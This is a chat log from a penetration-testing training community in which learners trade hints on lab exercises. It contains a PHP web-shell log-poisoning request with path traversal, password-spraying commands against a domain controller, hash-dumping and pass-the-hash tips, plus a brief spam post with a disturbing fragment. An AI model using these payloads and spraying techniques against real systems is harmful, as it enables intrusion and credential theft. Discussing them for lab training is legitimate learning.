# jaunty vigil quote the entire thing

||```
GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1

Host: 178.62.8.249:31685

User-Agent: '<?php system($_GET["cmd"]); ?>'

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1



/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1710 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
178.62.8.249 - - [28/Feb/2023:02:04:23 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1761 "-" "poison"
178.62.8.249 - - [28/Feb/2023:02:04:25 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1761 "-" "poison"
178.62.8.249 - - [28/Feb/2023:02:04:33 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 1785 "-" "poison"
178.62.8.249 - - [28/Feb/2023:02:05:26 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1" 200 1799 "-" "'


I get this... not sure what is going on i have tried many times other ways to do it.
foggy light
#

Password Attack : Lab Medium
I just cracked the password using id_rsa. Whats next ? any hint

jaunty vigil
#

||"<?php system($_GET['cmd']); ?>"||

#

@simple zephyr

opaque niche
jaunty vigil
#

anyone know how to do the osticket part ?

#

i think it might be ||tt||

dapper temple
#

anyone did an update of crackmapexec and now start to receive errors?
args = gen_cli_args()

fathom pendant
#

aka what is the RSA usually for?

foggy light
#

solved it. thanks

simple zephyr
trail obsidian
#

Can't seem to get the privesc to work on Windows Privilege Escalation Skills Assessment I found a CLSID but it's authing as the current user. Am I on the right path? NVM, I was using the wrong one the whole time haha.

drifting sequoia
#

tt

surreal perch
#

Hi Everyone, Need some assistance where am i missing > on file inclusion -LAST Q-skill assessment) As i hv tried multiple probabilites using PHP wrappers but no luck ...still getting blank page and not able to get php.ini (anyONE ON THE SAME PAGE/ISSUE?

acoustic owl
gray blade
#

Hey, im stuck on Active Directory Assessment II. Iโ€™m stuck on this question: Use a common method to obtain weak credentials for another user.

grim terrace
#

can someone nudge me on "Escape" box..
got 2 credentials
1 works sql and 1 works on sql and windows both .. still no user flag and access...

fading gale
#

Please who here knows how to dork

grand bane
#

Hey can someone help me to grab the FTP server banner for FTP - Footprinting ?

autumn pilot
#

is there something that you don't understand?

grand bane
#

no, i ran ||nmap script to grab banner, nmap default script, command status in the ftp server, i got 220 InFreight FTP v1.1|| but this is not the flag i don't understand

autumn pilot
#

The flag and the banner are two separate questions

grand bane
#

sorry, i want to submit the banner for the first question, i already have the flag.txt

autumn pilot
#

all I can say is that you have the banner

grand bane
#

wtf

autumn pilot
#

you only need to make the differentiation what the banner consists of

grand bane
#

but it only asks to submit the entire banner, so i don't understand

autumn pilot
#

yes, that is correct and you have it, but you also have something that is not part of the banner

grand bane
#

ok thanks

autumn pilot
#

try asking yourself if I have the banner, then what could be stopping me to submit it, do I have something extra how can I narrow it down and understand what that extra is and what it indicates

proud cloak
#

anyone available for help on the last hop of the pivoting skill assessment ?

grand harbor
#

anyone can help me with this one(What is the FQDN of the host where the last octet ends with "x.x.x.203"?) and yes i have bruteforced all the domains i found but every time i get this message: NS record query failed: REFUSED

near hinge
#

hey i'm learning Navigation section in Linux Fundamental modules, but is this suppose to be the right answer?

gray blade
#

Hello everyone, im stuck on Active Directory Assessment II. Iโ€™m stuck on this question: Use a common method to obtain weak credentials for another user.

vital adder
#

hint ||password spraying ||

vital adder
vital adder
vestal mica
#

Hi

vital adder
proud cloak
vital adder
#

oh you don't need to

grand harbor
#

only internal and the normal one can complete the transfer

vestal mica
#

I can be a teacher i'm profesional at this

vital adder
vital adder
vestal mica
#

How can I be a teacher?

gray blade
autumn pilot
vestal mica
grand harbor
#

like this right

autumn pilot
vital adder
vestal mica
#

Because I'm a cibersecurity teacher irl

autumn pilot
#

nice

#

what are the differences between stdin stdout and stderr

vestal mica
#

stdin โˆ’ It stands for standard input, and is used for taking text as an input. stdout โˆ’ It stands for standard output, and is used to text output of any command you type in the terminal, and then that output is stored in the stdout stream. stderr โˆ’ It stands for standard error

vital adder
grand harbor
vital adder
vestal mica
#

stream standards

#

When you enter a command, if no file name is given, your keyboard is the standard input, sometimes denoted as stdin . When a command finishes, the results are displayed on your screen. Your screen is the standard output, sometimes denoted as stdout .

autumn pilot
#

enter a command where

vestal mica
# autumn pilot enter a command where

The I/O streams can be redirected by putting the n> operator in use, where n is the file descriptor number. For redirecting stdout, we use โ€œ1>โ€ and for stderr, โ€œ2>โ€ is added as an operator.

vestal mica
autumn pilot
#

I'm not sure what console is

autumn pilot
#

what are the numbers in the url is that math?

vital adder
vestal mica
grand harbor
gray blade
near hinge
vestal mica
# autumn pilot is it only that

A URL can contain a number to identify to the website itself what data that URL should get from the database powering the site. The number corresponds to the ID of the category or post (or ecommerce item or... etc etc).

autumn pilot
#

but the url you gave is not an ecommerce item

vestal mica
vital adder
vital adder
autumn pilot
grand harbor
#

@vital adder when i do that i get: internal.inlanefreight.htb NS record query failed: REFUSED

vestal mica
vital adder
autumn pilot
vestal mica
#

I do it because I like my work

#

I love teaching others cibersecurty, my speciality

vital adder
#

can you teach me how to hack??

vestal mica
#

what do u want to hack?

#

You want to learn from the beginnig?

vital adder
#

nvm i learned, you are a great teacher

vestal mica
grand harbor
#

@vital adder i found it

#

thanks

vestal mica
#

@autumn pilot do I get a role? or what

autumn pilot
#

nope

vestal mica
#

Okay

rustic sage
#

bagel machine?done?

#

any1?

fathom mortar
#

hello guys. Can someone helpme out with active directory enum & attacks on section Password spraying - making a target user list

autumn pilot
#

what exactly

fathom mortar
#

im using kerbrute for the user enumeration

#

but something doesnt seem to work

autumn pilot
#

Are you following the arguments in the example from the section?

fathom mortar
#

yeah

autumn pilot
#

and what is the error

fathom mortar
#

DM ?

autumn pilot
#

paste it here for future reference if someone else stumbles across the same issue

fathom mortar
autumn pilot
#

are you sure that this is the IP of the domain controller

fathom mortar
#

I thought maybe the mistake was to use the wrong IP. Then did fping and found another IP. Testet it with the other one but same results

autumn pilot
#

try to find a way to identify the domain controller

#

and a bonus question, how many NICs does the jumpbox has and why

uncut mirage
#

Hey guys,
I'm in the Active Directory Enumeration & Attacks module, Internal Password Spraying - from Linux section.
||I made a valid users list with kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " > validusers.txt and i looks good when i cat it. Problem is that neither the bash one-liner, Kerbrute or CrackMapExec works. I got the answer for the section, but I just want to know what I'm doing wrong since I can't get any of the tools to work.

โ”Œโ”€[โœ—]โ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $for u in $(cat validusers.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done
โ”Œโ”€[โœ—]โ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validusers.txt  Welcome1
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 02/28/23 - Ronnie Flathers @ropnop

2023/02/28 07:09:28 >  Using KDC(s):
2023/02/28 07:09:28 >      172.16.5.5:88
2023/02/28 07:09:28 >  [!] adunn@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 07:09:29 >  Done! Tested 20 logins (0 successes) in 0.589 seconds
โ”Œโ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $sudo crackmapexec smb 172.16.5.5 -u validusers.txt -p Welcome1 | grep +
โ”Œโ”€[โœ—]โ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $
```||
autumn pilot
#

remove the grep that you are piping and check if the domain\username is appropriately appended

#

shot in the dark, but let's see

uncut mirage
# autumn pilot remove the grep that you are piping and check if the domain\username is appropri...

||```โ”Œโ”€[โœ—]โ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $sudo crackmapexec smb 172.16.5.5 -u validusers.txt -p Welcome1
<SNIP>
SMB 172.16.5.5 445 ACADEMY-EA-DC01 [-] INLANEFREIGHT.LOCAL\sgage@inlanefreight.local:Welcome1 STATUS_LOGON_FAILURE
<SNIP>

โ”Œโ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $for u in $(cat validusers.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5; done
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
<SNIP>

Wait... It cannot connect?!?
autumn pilot
#

seems like it

fathom mortar
#

maybe refresh the host again

autumn pilot
#

try to ping the DC, or banner grab the smb

#

see if it responds and etc

uncut mirage
#

Ping is fine

โ””โ”€โ”€โ•ผ $ping 172.16.5.5
PING 172.16.5.5 (172.16.5.5) 56(84) bytes of data.
64 bytes from 172.16.5.5: icmp_seq=1 ttl=128 time=0.454 ms
64 bytes from 172.16.5.5: icmp_seq=2 ttl=128 time=0.441 ms
64 bytes from 172.16.5.5: icmp_seq=3 ttl=128 time=0.534 ms```
#

Broken/unstable lab?

#

As long as i know I'm not the problem I'll be satisfied...

autumn pilot
#

ping might be fine, but smb might not

uncut mirage
#
โ””โ”€โ”€โ•ผ $smbclient -L 172.16.5.5
Enter WORKGROUP\htb-student's password: 
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
SMB1 disabled -- no workgroup available
autumn pilot
#

seems to be working, so the problem might be somewhere in the userlist

#

looks good yup

#

can you try with kerbrute's password spray

uncut mirage
#
โ”Œโ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validusers.txt  Welcome1

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 02/28/23 - Ronnie Flathers @ropnop

2023/02/28 07:39:27 >  Using KDC(s):
2023/02/28 07:39:27 >      172.16.5.5:88

2023/02/28 07:39:27 >  [!] adunn@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 07:39:27 >  Done! Tested 21 logins (0 successes) in 0.065 seconds
#

It doesn't even seem to try all 57 usernames

fathom mortar
#

which command did you use before to create a list from the kerbrute ?

uncut mirage
autumn pilot
#

give it a go with manually specifying a random username (entry from the userlist) and the password

fathom mortar
#

maybe with a flag --user-as-pass ?

#

when i run kerbrute passwordspray command. I get errors ?

uncut mirage
#

What is the problem?

fathom mortar
#

you got a hit. I got nothing

#

i dont know

uncut mirage
#

My hit was an error too

fathom mortar
#

hmmmm

uncut mirage
#

Broken lab?

fathom mortar
#

i will text support

uncut mirage
#

I need it to work with a list though...

fathom mortar
#

i tried with crackmapexec

#

the list and the password

#

it didnt even gave a hit

uncut mirage
#

Exactly...

gray blade
#

Hum maybe i have the same problem with assessment skill 2 with kerbrute

fathom mortar
#

Okay i texted the support now and bombed him with screenshots ๐Ÿ˜‚

uncut mirage
#

๐Ÿ˜‚

fathom mortar
#

He'll check it he said

uncut mirage
fathom mortar
#

I should wait

cyan ginkgo
#

So in the module u have to use the parot box to locally connect to inline, but when ever i try to upload a war file to the tomcat, it excutes but my i dont get a shell connection and i have used msfvenom and the msfconsole itself. Then i tried it on the blue machine and the msfconsole said it was vuln but no session created ( i opened the shell in the webpage)

uncut mirage
cyan ginkgo
#

The last one with the parrot box

autumn pilot
#

@uncut mirage @fathom mortar works for me

#

you can skip the whole enumeration from rpc and the oneliner and just use the jsmiths.txt file to grep for accounts starting with s , generating such a wordlist can be used with kerbrute

#

and of course with crackmapexec

fathom mortar
#

but cme doesnt work for me neither

autumn pilot
#

have you grepped the jsmith.txt list for usernames starting with S?

fathom mortar
#

i'll try that way. I thought you mean normal txt with cme

uncut mirage
#

But still. Why does kerbrute only work with one entry in the file?

autumn pilot
#

could it be due to formatting in the file

fathom mortar
#

^how do you remove all @inlanefreight.com at once ?

autumn pilot
fathom mortar
#

so the tail command ?

autumn pilot
#

nope just showcasing 5 entries of the users.txt to fit into the screenshot

fathom mortar
#

oh

autumn pilot
#

same goes for head

uncut mirage
# autumn pilot could it be due to formatting in the file
โ””โ”€โ”€โ•ผ $cat validusers.txt 
dpayne@inlanefreight.local
mhicks@inlanefreight.local
adunn@inlanefreight.local
lmatthews@inlanefreight.local
avazquez@inlanefreight.local
mlowe@inlanefreight.local
<SNIP>
sgage@inlanefreight.local
jshay@inlanefreight.local
jhermann@inlanefreight.local
whouse@inlanefreight.local
emercer@inlanefreight.local
wshepherd@inlanefreight.local
โ”Œโ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $cat validusers2.txt 
sgage@inlanefreight.local```
`validusers.txt` does not work, `validuser2.txt` does work. No difference in formatting as far as i can see?
fathom mortar
#

what does the cut -d '@' -f1 stand for

autumn pilot
autumn pilot
uncut mirage
autumn pilot
#

interesting

fathom mortar
#

i did it now with the list only with users adn tried it with kerbrute. Still not working

#

@uncut mirage does it work for you ?

uncut mirage
#

Yeah kerbrute is still not working for either of us

fathom mortar
autumn pilot
#

remove the ||@inlanefreight.local||

fathom mortar
#

i did

uncut mirage
#

Kerbrute needs to be with

fathom mortar
uncut mirage
fathom mortar
#

only cme

#

kerbrute doesnt worjk

uncut mirage
#

Yes, Kerbrute is still a bitch...

autumn pilot
#

interesting behaviour of the tool

fathom mortar
#

yeah

autumn pilot
#

it automatically appends the "domain" (kerbrute), however, if you have a list that contains that domain it will throw an error

#

maybe it has to something with the way of how it treats the entries

#

so yeah, you definitely don't need the @inlanefreight.local part

fathom mortar
#

it worked with kerbrute for the supportguy too

autumn pilot
#

this is due to automatically appending the @domain at the username when a valid login is found, this is not the actual entry from the wordlist

gray blade
#

And for find user weak credentials for an other user for Active Directory assessment skill II?

autumn pilot
#

which feeds the illusion that the user wordlist is in the form of username@<DOMAIN.COM>

vast kelp
#

this is a bad question, but how can i get to the cybernetics prolab channel?

edit just verify again ig ๐Ÿ™‚

uncut mirage
# autumn pilot which feeds the illusion that the user wordlist is in the form of ``username@<DO...

I removed the domain and it still doesn't work for me with kerbrute...

โ””โ”€โ”€โ•ผ $cat validusers2.txt 
jjones
sbrown
<SNIP>
evalentin
sgage
jshay
jhermann
whouse
emercer
wshepherd
โ”Œโ”€[htb-student@ea-attack01]โ”€[~]
โ””โ”€โ”€โ•ผ $kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 validusers2.txt  Welcome1

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (9cfb81e) - 02/28/23 - Ronnie Flathers @ropnop

2023/02/28 08:43:03 >  Using KDC(s):
2023/02/28 08:43:03 >      172.16.5.5:88

2023/02/28 08:43:03 >  [!] bdavis@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 08:43:03 >  [!] mmorgan@inlanefreight.local:Welcome1 - [Root cause: KDC_Error] KDC_Error: AS Exchange Error: kerberos error response from KDC: KRB Error: (14) KDC_ERR_ETYPE_NOSUPP KDC has no support for encryption type
2023/02/28 08:43:03 >  Done! Tested 21 logins (0 successes) in 0.085 seconds```
#

The bash one-liner and CME works though!

autumn pilot
#

Yes, because kerbrute will append -d inlanefreight.local to the users, e.g. if the userlist contains only checkmate entry, then kerbrute will try checkmate@inlanefreight.local

#

at least for now this is my logic

steep blaze
#

hello everyone can someone help me with windows privesc skills assessment please ?

autumn pilot
#

also let's remove any spoilers

uncut mirage
autumn pilot
#

it works for me for some reason

uncut mirage
#

But a singe entry without the domain would?

autumn pilot
uncut mirage
autumn pilot
#

fails

#

hmm

uncut mirage
#

Exactly WTF is wrong? On a real engagement that is how you would do it...

autumn pilot
#

it is not even consistent, it will check for example 15 logins and on the next run 20

fathom mortar
#

yeah

uncut mirage
#

Yes, it makes no sense

autumn pilot
#

one approach would be to remove users that trigger the kdc_error from the list and run it again

#

maybe thats stopping the tool from going further but that doesn't make sense

uncut mirage
fathom mortar
#

it goes on. in the next section i try to connect via rdp. The only thing i get is a black screen ๐Ÿ˜‚

uncut mirage
#

Can we get support to try with kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep @in | cut -f8 -d" " | cut -d '@' -f1 > validusers.txt? ๐Ÿ˜…

fathom mortar
#

he already close my ticket

autumn pilot
#

my guess would it be due to the nature of how those accounts were created is triggering that error message, if you remove all of those user entries that trigger it kerbrute will proceed with the passwordspray

fathom mortar
#

@uncut mirage can you connect to the host via rdp in the next section ?

uncut mirage
uncut mirage
fathom mortar
#

Yeh for me too

autumn pilot
#

click enter or click anywhere on the screen

fathom mortar
#

oh yeah

#

thanks

grand harbor
#

anyone that knows how how to travel in the imap command line

#

becouse its turning me crazy and i dont know how to get the flag

fast raft
autumn pilot
#

have you connected to the target?

surreal perch
#

Hi Everyone, Need some assistance where am i missing > on file inclusion -LAST Q-skill assessment) As i hv tried multiple probabilites using PHP wrappers but no luck ...still getting blank page and not able to get php.ini (anyONE ON THE SAME PAGE/ISSUE?

mossy urchin
#

Fuzzing Module
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb/

Nothing gets displayed i don't know what am doing wrong..

fathom pendant
#

Capitalize FUZZ

#

Also

mossy urchin
#

yes yes, i fixed the url, still nothing

mossy urchin
fathom pendant
#

Is your SecList in that directory?

mossy urchin
jaunty vigil
#

the only time yours will work on internal domains is if you have a dnsmasq setup

fathom pendant
#

Thanks I knew there was something off

surreal perch
#

FUZZ: /opt/useful & not FUZZ: SPACE/opt/useful <<<hope it helps further (a little typo can waste much time) CHEERS ๐Ÿ™‚

fathom pendant
#

I just couldn't pin it

vestal mica
#

Hi

mossy urchin
#

thank you guys!

vestal mica
#

Does someone need help?

night geyser
vestal mica
night geyser
#

Ugh i can't upload the picture

#

However

vestal mica
#

dms

night geyser
#

I am trying to run command scrcpy in kali linux

#

But it doesn't work

vestal mica
#

Show me what you are doing

night geyser
#

I tried to download it using "sudo apt install scrcpy" but nothing except an err says Unable to locate package

night geyser
#

I will dm u

vestal mica
#

yes

rustic sage
#

?

autumn pilot
#

english only

rustic sage
#

sorry bro

hasty solar
#

in Password Mutations from PASSWORD ATTACKS what rule did you used guys, I tried with the default custom rule downloaded from resources section and found nothing, i have another question in Network Services which wordlist did you use to brute force rdp, tried with resources wordlist and didnt find anything

autumn pilot
#

once you have created a mutated wordlist using the rule and the provided wordlist have you tried to brute force the login of the mentioned user

hasty solar
autumn pilot
#

looks like you have a syntax issue

hasty solar
#

where is the issue?

autumn pilot
#

my eyes are the issue

#

it is capital i and I thought it was lowercase L

hasty solar
#

dont worry I use glasses fingerguns

autumn pilot
#

to sum it up, the command looks good

hasty solar
#

thanks, hydra its giving me [VERBOSE] Disabled child 10 because of too many errors so gonna try with ncrack

turbid tartan
#

im struggling at the last question of the first PtH (PasswordAttacks)

autumn pilot
#

yeah the dc01 is wonky

#

and it doesn't work straight out of the box

turbid tartan
#

ah great

autumn pilot
#

something that came to my mind, that you can try is to use ligolo or other tool that will create the tunnel that you can utilize with evil-wirnm and the -H option for login using the hash

#

might not work, but worth the try

turbid tartan
#

i swear man the password attacks is breaking me

#

its not hard but its cost just a lot of patience

fading coyote
#

hello i am having difficulty with one of the modules was wondering if i could get help here

dim wolf
#

just post your question and someone's likely to help

#

your output has a flag visible.. maybe spoiler it

#

and i'm not sure what question you're trying to answer from what module

fading coyote
#

After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.

#

the flag wasn't an answer to anything as far as i know

dim wolf
#

this is from the nmap module?

fading coyote
#

yep

dim wolf
#

if this is the medium skills assessment, the way i arrived at the answer is not how it was intended to be found

fading coyote
#

i tried looking at the scripts that nmap has

#

none of them gave me an answer tho

#

-sV just doesn't return anything for port 53

dim wolf
#

i think for this one you have to understand how DNS works

#

do you know how DNS questions and answers are sent?

autumn pilot
#

the flag is literally in the output that you gave

fading coyote
#

not a flag

dim wolf
#

i thought he said that it didn't work

autumn pilot
#

ah

#

which module is that and section

fading coyote
fading coyote
#

Firewall and IDS/IPS Evasion - Medium Lab

#

actually

#

i was copy pasting the flag and it had an extra space

#

lol

#

all good now

#

thank you for the help Xd

dim wolf
#

just had a look at the section..

#

and that was the flag

fading coyote
#

the way its worded is weird thought

dim wolf
#

it makes sense though

#

you did a version scan and it gave you the version

fading coyote
#

well since it was asking for a version i was looking for x.xx.xx kinda format

fading coyote
#

thank you for the help tho

nova bolt
#

A error is coming there is writen that u free users only allow 1 pwnbox

autumn pilot
#

yup

nova bolt
autumn pilot
#

don't be a free user

dim wolf
#

hehe

nova bolt
autumn pilot
#

check the billing page

nova bolt
#

ok,but live in india i have rupi how i will give $

autumn pilot
#

I have no idea, sorry

dim wolf
#

i think it automagically converts it to $?

#

a service i use takes payment in yen but since i live in the US it converts my $ to yen

livid bluff
#

Hi,
Anyone have a hint for Credential Hunting in Linux in passwords attacks module ?
I'm conneted in ssh
I used all the technics in the course but we can't download anything.
There is no python
In the history we find a trace about firefox decrypt but i can't download it on the host.

opaque niche
#

I believe if my memory serves me correctly

livid bluff
# opaque niche the firefox decrypt is already on the machine

Thanks for your reply !

I don't see it on the machine and in the bash history we can see that it is deleted.

In addition on the machine there is no python and I can not download anything on this machine it has no access to the internet
Even opening a web server on my local machine does not allow me to download files

cerulean crow
#

module: Password Attacks

section: Protected Archives

I'm having trouble with the challenge on this one. Had no trouble cracking SSH keys but I can't seem to get any of the three wordlists (password.list, mutated.list, rockyou.txt) to work cracking these .zip archives

vale crescent
#

Can I master cybersec only with hack the box

fathom pendant
#

Hint: kira

vale crescent
#

?

#

I meant about self studying

fathom pendant
#

Master is a strong word, you can get good at it

#

But mastering is a different thing

vale crescent
#

Mmm yes

#

I just don't have money to spend for a uni degree

#

So I'm just thinking about self study just wanna make shure

opaque niche
sleek silo
#

HI there srry if it's the wrong channel cause there is no general does anyone knows about cracking here ?

livid bluff
#

Oh yes i find python
I need to find how upload firefox_decrypt

#

So i'm stupid now it's ok with a local server ....

#

I have restart the target perhaps there was a problem

vestal mica
#

Hi

hallow remnant
#

I feel a little silly asking this, but how do you go about resetting bloodhound? Like between engagements?

thorn urchin
#

pretty sure you gotta clear the neo4j db. Best way to do so idk.

autumn pilot
#

maybe this button can help you

rustic sage
#

Just came here to celebrate... My fist hack! ๐Ÿฅณ Love the course answer!

#

This pen testing course is really interesting! It keeps me going for more!

livid zephyr
#

module: footprinting section: footprinting lab-easy. I want to confirm something. When you ftp to the site, does it look like this to you? . I am trying to figure out if it is my firewall blocking the return data or is something else. I did try to start an instance of the online workstation, but it just hangs waiting for the instance to start. My roommate was messing out with the firewall during the weekend, I am not sure if he installed a new one or just played around with the settings trying to harden it.

woeful ermine
livid zephyr
deft escarp
#

im on the medium box of footprinting module. I mounted the NFS share and created a custom group mimicking the group id of the mounted file, I named it hopefully. I assigned the group to a user I created, but when I try to go inside the folder it wont let me. So I use sudo, but the passwd I set for the user doesn't work. Here's some information:
||```
$ ls -l
Total 64
drwx------ 2 nobody hopefully 65536 Nov 11 2021 TechSupport
$ sudo cd TechSupport/
[sudo] password for testest:
testest is not in the sudoers file. This incident will be reported.

narrow jungle
#

Hey people, just having an issue on one of the academy modules, i'm on the INTRO TO CMD modfule on "Finding files and directories"

#

i've RDP to the windows machine, now i'm in the CMD trying to find that file, been using commands such as

"find /R c:\Users\htb-student\ waldo.txt"
"where /R c:\Users\htb-student\ waldo.txt"

#

having no luck, can someone point me in the right direction

acoustic owl
narrow jungle
#

i tried that by just using C:\ in the command

#

let me try again

autumn pilot
#

have you elevated your prompt?

narrow jungle
#

oh god

#

all that time

#

i just spent around an hour trying to work this out myself and the simple answer is that i wasn't running CMD in admin mode

#

so i was using the right commands, but just wasn't using my brain

#

Thank you my friend

autumn pilot
#

in theory and in practice those should work

elder tapir
#

For AD Enumeration: ACL Abuse Tactics. I keep attempting to run through the given examples, but getting
damundsen user not found when running Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

I've attempted to refer to the domain using a Domain flag but nothing is working and so I am stuck on this module and the next, since the next one depends on leveraging adunn's privileges which need damundsen's privileges

dapper temple
#

I need a bit of help with Password Attacks Lab - Hard
I managed to get both ||SAM & SYSTEM|| from the|| VHD|| after mounting it. I dumped the creds but I can't seem to use them anywhere. I tried cme, winrm, and rdp.

dapper temple
opaque niche
#

try that

dapper temple
opaque niche
#

probably since you're pretty close to the flag

dapper temple
#

yeah I tried with 3 users||(johanna,david, administrator)|| the same hash from|| samdump2 || i get --> Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
it should work with ||administrator||

opaque niche
dapper temple
#

let me try secretsdump

dapper temple
dapper temple
#

I'm using samdump2 3.0.0

#

Impacket v0.10.1

#

the impacket is older than the samdump2(its the latest)

#

found the answer, so someone here doesn't fall into the same trap as me
samdump2 is used to extract hashes from Windows 2k/NT/XP/Vista SAM

The machine I was using it on is a Windows Server 2019.

naive sky
#

is there any idea please for this?

#

how to search for it using sqlmap

thorn urchin
#

read the section info again about dumping column names

naive sky
#

i have tried but ididnt get

thorn urchin
#

which module and section is this one again?

naive sky
#

done i got by just know thanks

thick parrot
#

There any chance a mod can dm me regarding authentication issues?

naive sky
#

why it doesnt work?

gleaming python
#

i got a question i have 30 cubes and tried to unlock a modules worth ten but it wont let me dose any one know whats going on

gleaming python
#

nvm i got it

naive sky
modest isle
#

Hello guys

#

Good morning

#

How can I subscribe to HTB student package?

I need a valid academic domain so I can subscribe, please ๐Ÿฅบ

fathom pendant
#

If you have an academic email that isn't accepted contact support with the green bubble on the bottom right and they can review it

modest isle
#

What if they still don't verify it?

ivory bough
honest ridge
#

module = password attacks - section passwd, Shadow & opasswd.

I have the shadow.bak and passwd.bak files then unshadow then trying to run hashcat against it. i think i need to string mut it but have no idea?
any hints?

ivory bough
# naive sky

You have to provide a csrf token as the value of the 'csrf-token'

#

not just the name

#

you can intercept the request with burp and see a csrf token i think

thorn urchin
tidal kelp
#

Module Name: Windows PE

Section Name: Interacting with Users

the question Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user. i do like the section but just got htb-student . can someone can help me out?

naive sky
#

actually this password i could do it by my own , isnt? or how i couldnt understand?

fathom pendant
#

You are sending a phishing payload

#

To obtain creds

#

That's all I can say as I haven't done it

naive sky
#

i dont know what does it mean

fathom pendant
#

It tells you exactly what it wants you to do

#

Using the base html form and an XSS payload, send it on "send.php" you should see a return of the credentials

#

This is the most verbose questions

rustic sage
#

ok

rustic sage
#

dead chat

fathom pendant
#

Because this isn't the Gen chat

rustic sage
fathom pendant
rustic sage
fathom pendant
rustic sage
fathom pendant
#

You having fun kid?

rustic sage
# fathom pendant You having fun kid?
  1. Line the bathtub: Line the bathtub with a plastic sheet or liner to make cleaning up easier. You can also place towels or absorbent materials on the bottom of the bathtub to help absorb the waste.
fathom pendant
#

<@&861185840277487616>

#

Get embed failed

#

Skiddie

#

Yep a bot

thorn urchin
#

yikes

rustic sage
low girder
fathom pendant
#

Nope a bot

#

See

thorn urchin
river lichen
#

lol

#

so @low girder how fast are you

little whaleBOT
#

another mrbeast copy (1080060416169869312) has been banned until 2035-12-05 06:22:41 (UTC).

uncut sequoia
#

Hehe

river lichen
#

dang p fast

thorn urchin
#

tempban ๐Ÿ˜‚

fathom pendant
#

2035 splodewheeze

uncut sequoia
#

2035 tempban

thorn urchin
#

12 years later bot just resumes

fathom pendant
#

They'd have to rejoin first

#

But off-topic

uncut sequoia
#

In 12 years, I'll be old

fathom pendant
#

You're already old

uncut sequoia
#

Absolutely rude, you don't have to remind me FeelsBadMan

honest ridge
#

module = password attacks - section passwd, Shadow & opasswd.

I have the shadow.bak and passwd.bak files then unshadow then trying to run hashcat against it. not working. i know i have to change the password.list file but gives me nothing to go off ?

any hints?

spring grove
#

Is there any reason why webshells disappear? I'll be typing commands ("1.1.1.1/shell.php?cmd=id" for example), and it'll be fine until I randomly get "the requested URL was not found on this server" even though it's the same shell I've been using the entire time. When I try to find the shell again it seems to have vanished & I have to make a new one.

low vine
#

Just checking to see if theres problems with the Targets in the modules. Have closed browser as well as disconnect/reconnect VPN and I cannot create a target in WEB ATTACKS - Local File Disclosure. I can create / reset targets in other areas just not here....

#

sorted itself out

naive sky
#

please

#

is there any ide guys?

fathom pendant
naive sky
#

